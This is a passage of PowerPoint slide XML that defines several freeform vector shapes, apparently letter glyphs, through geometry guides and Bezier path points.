                  <a:cubicBezTo>
                    <a:pt x="99" y="329"/>
                    <a:pt x="122" y="263"/>
                    <a:pt x="124" y="257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201"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6" name="Freeform 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2EBC8-91C6-461B-8F1B-9C585E451536}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId33"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4062412" y="1184275"/>
              <a:ext cx="95250" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 249"/>
                <a:gd name="T1" fmla="*/ 159 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 249"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 76 w 249"/>
                <a:gd name="T5" fmla="*/ 114 h 305"/>
                <a:gd name="T6" fmla="*/ 76 w 249"/>
                <a:gd name="T7" fmla="*/ 21 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 249"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 20 w 249"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 249"/>
                <a:gd name="T13" fmla="*/ 16 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 42 w 249"/>
                <a:gd name="T17" fmla="*/ 31 h 305"/>
                <a:gd name="T18" fmla="*/ 42 w 249"/>
                <a:gd name="T19" fmla="*/ 275 h 305"/>
                <a:gd name="T20" fmla="*/ 20 w 249"/>
                <a:gd name="T21" fmla="*/ 275 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 249"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 249"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 99 w 249"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 249"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 98 w 249"/>
                <a:gd name="T31" fmla="*/ 275 h 305"/>
                <a:gd name="T32" fmla="*/ 76 w 249"/>
                <a:gd name="T33" fmla="*/ 275 h 305"/>
                <a:gd name="T34" fmla="*/ 76 w 249"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 249"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 172 w 249"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 172 w 249"/>
                <a:gd name="T41" fmla="*/ 275 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 249"/>
                <a:gd name="T43" fmla="*/ 275 h 305"/>
                <a:gd name="T44" fmla="*/ 132 w 249"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 249"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 229 w 249"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 249 w 249"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 249"/>
                <a:gd name="T53" fmla="*/ 275 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 249"/>
                <a:gd name="T55" fmla="*/ 275 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 249"/>
                <a:gd name="T57" fmla="*/ 159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9" h="305">
                  <a:moveTo>
                    <a:pt x="207" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="109"/>
                    <a:pt x="181" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="87"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="76" y="114"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="305"/>
                    <a:pt x="119" y="305"/>
                    <a:pt x="119" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="275"/>
                    <a:pt x="106" y="275"/>
                    <a:pt x="98" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="186"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="136"/>
                    <a:pt x="113" y="117"/>
                    <a:pt x="139" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="117"/>
                    <a:pt x="172" y="131"/>
                    <a:pt x="172" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="275"/>
                    <a:pt x="132" y="275"/>
                    <a:pt x="132" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="305"/>
                    <a:pt x="146" y="305"/>
                    <a:pt x="153" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="305"/>
                    <a:pt x="249" y="305"/>
                    <a:pt x="249" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="275"/>
                    <a:pt x="237" y="275"/>
                    <a:pt x="229" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="15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7" name="Freeform 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D0CF35-5764-494A-A9B8-8587950BDD62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId34"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4171950" y="1219200"/>
              <a:ext cx="77788" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 105 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168 w 204"/>
                <a:gd name="T27" fmla="*/ 94 h 222"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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2">
                  <a:moveTo>
                    <a:pt x="184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="48"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="57"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="42"/>
                    <a:pt x="168" y="94"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="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8" name="Freeform 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD4B592-CE2F-4A73-8034-510F6CC6CE35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId35"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4267200" y="1219200"/>
              <a:ext cx="87313" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 94 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 30 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 52 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 94 w 227"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 94 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="94" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="78"/>
                    <a:pt x="124" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="42"/>
                    <a:pt x="193" y="52"/>
                    <a:pt x="206" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="52"/>
                    <a:pt x="227" y="44"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="94" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="8"/>
                    <a:pt x="91" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="188"/>
                    <a:pt x="157" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="12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49" name="Freeform 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E8CDE23-0CF1-4F06-93DB-A30D5CA4214F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId36"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4373562" y="1219200"/>
              <a:ext cx="77788" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 19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22">
                  <a:moveTo>
                    <a:pt x="204" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="62"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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0" name="Freeform 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3CC5A5-66E3-4AD0-851E-67FC9ABE268A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId37"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1646237" y="1420813"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 230"/>
                <a:gd name="T1" fmla="*/ 125 h 315"/>
                <a:gd name="T2" fmla="*/ 210 w 230"/>
                <a:gd name="T3" fmla="*/ 125 h 315"/>
                <a:gd name="T4" fmla="*/ 230 w 230"/>
                <a:gd name="T5" fmla="*/ 110 h 315"/>
                <a:gd name="T6" fmla="*/ 210 w 230"/>
                <a:gd name="T7" fmla="*/ 95 h 315"/>
                <a:gd name="T8" fmla="*/ 164 w 230"/>
                <a:gd name="T9" fmla="*/ 95 h 315"/>
                <a:gd name="T10" fmla="*/ 144 w 230"/>
                <a:gd name="T11" fmla="*/ 110 h 315"/>
                <a:gd name="T12" fmla="*/ 165 w 230"/>
                <a:gd name="T13" fmla="*/ 125 h 315"/>
                <a:gd name="T14" fmla="*/ 121 w 230"/>
                <a:gd name="T15" fmla="*/ 230 h 315"/>
                <a:gd name="T16" fmla="*/ 85 w 230"/>
                <a:gd name="T17" fmla="*/ 161 h 315"/>
                <a:gd name="T18" fmla="*/ 135 w 230"/>
                <a:gd name="T19" fmla="*/ 68 h 315"/>
                <a:gd name="T20" fmla="*/ 89 w 230"/>
                <a:gd name="T21" fmla="*/ 0 h 315"/>
                <a:gd name="T22" fmla="*/ 37 w 230"/>
                <a:gd name="T23" fmla="*/ 72 h 315"/>
                <a:gd name="T24" fmla="*/ 51 w 230"/>
                <a:gd name="T25" fmla="*/ 153 h 315"/>
                <a:gd name="T26" fmla="*/ 17 w 230"/>
                <a:gd name="T27" fmla="*/ 189 h 315"/>
                <a:gd name="T28" fmla="*/ 0 w 230"/>
                <a:gd name="T29" fmla="*/ 241 h 315"/>
                <a:gd name="T30" fmla="*/ 61 w 230"/>
                <a:gd name="T31" fmla="*/ 315 h 315"/>
                <a:gd name="T32" fmla="*/ 123 w 230"/>
                <a:gd name="T33" fmla="*/ 280 h 315"/>
                <a:gd name="T34" fmla="*/ 181 w 230"/>
                <a:gd name="T35" fmla="*/ 315 h 315"/>
                <a:gd name="T36" fmla="*/ 229 w 230"/>
                <a:gd name="T37" fmla="*/ 257 h 315"/>
                <a:gd name="T38" fmla="*/ 215 w 230"/>
                <a:gd name="T39" fmla="*/ 241 h 315"/>
                <a:gd name="T40" fmla="*/ 201 w 230"/>
                <a:gd name="T41" fmla="*/ 256 h 315"/>
                <a:gd name="T42" fmla="*/ 181 w 230"/>
                <a:gd name="T43" fmla="*/ 285 h 315"/>
                <a:gd name="T44" fmla="*/ 139 w 230"/>
                <a:gd name="T45" fmla="*/ 256 h 315"/>
                <a:gd name="T46" fmla="*/ 165 w 230"/>
                <a:gd name="T47" fmla="*/ 203 h 315"/>
                <a:gd name="T48" fmla="*/ 195 w 230"/>
                <a:gd name="T49" fmla="*/ 125 h 315"/>
                <a:gd name="T50" fmla="*/ 73 w 230"/>
                <a:gd name="T51" fmla="*/ 128 h 315"/>
                <a:gd name="T52" fmla="*/ 65 w 230"/>
                <a:gd name="T53" fmla="*/ 72 h 315"/>
                <a:gd name="T54" fmla="*/ 89 w 230"/>
                <a:gd name="T55" fmla="*/ 30 h 315"/>
                <a:gd name="T56" fmla="*/ 107 w 230"/>
                <a:gd name="T57" fmla="*/ 68 h 315"/>
                <a:gd name="T58" fmla="*/ 73 w 230"/>
                <a:gd name="T59" fmla="*/ 128 h 315"/>
                <a:gd name="T60" fmla="*/ 63 w 230"/>
                <a:gd name="T61" fmla="*/ 184 h 315"/>
                <a:gd name="T62" fmla="*/ 83 w 230"/>
                <a:gd name="T63" fmla="*/ 220 h 315"/>
                <a:gd name="T64" fmla="*/ 105 w 230"/>
                <a:gd name="T65" fmla="*/ 256 h 315"/>
                <a:gd name="T66" fmla="*/ 62 w 230"/>
                <a:gd name="T67" fmla="*/ 285 h 315"/>
                <a:gd name="T68" fmla="*/ 34 w 230"/>
                <a:gd name="T69" fmla="*/ 240 h 315"/>
                <a:gd name="T70" fmla="*/ 63 w 230"/>
                <a:gd name="T71" fmla="*/ 18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0" h="315">
                  <a:moveTo>
                    <a:pt x="195" y="125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210" y="125"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="125"/>
                    <a:pt x="230" y="125"/>
                    <a:pt x="230" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="95"/>
                    <a:pt x="218" y="95"/>
                    <a:pt x="210" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="95"/>
                    <a:pt x="144" y="95"/>
                    <a:pt x="144" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="125"/>
                    <a:pt x="156" y="125"/>
                    <a:pt x="165" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="161"/>
                    <a:pt x="135" y="204"/>
                    <a:pt x="121" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="220"/>
                    <a:pt x="95" y="188"/>
                    <a:pt x="85" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="109"/>
                    <a:pt x="135" y="79"/>
                    <a:pt x="135" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="37"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="89" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="37" y="22"/>
                    <a:pt x="37" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="93"/>
                    <a:pt x="41" y="121"/>
                    <a:pt x="51" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="157"/>
                    <a:pt x="18" y="189"/>
                    <a:pt x="17" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="201"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="279"/>
                    <a:pt x="23" y="315"/>
                    <a:pt x="61" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="315"/>
                    <a:pt x="108" y="299"/>
                    <a:pt x="123" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="290"/>
                    <a:pt x="152" y="315"/>
                    <a:pt x="181" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="315"/>
                    <a:pt x="229" y="281"/>
                    <a:pt x="229" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="241"/>
                    <a:pt x="216" y="241"/>
                    <a:pt x="215" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="241"/>
                    <a:pt x="201" y="254"/>
                    <a:pt x="201" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="278"/>
                    <a:pt x="189" y="285"/>
                    <a:pt x="181" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="285"/>
                    <a:pt x="144" y="262"/>
                    <a:pt x="139" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="238"/>
                    <a:pt x="160" y="216"/>
                    <a:pt x="165" y="203"/>
                  </a:cubicBezTo>
                  <a:lnTo>
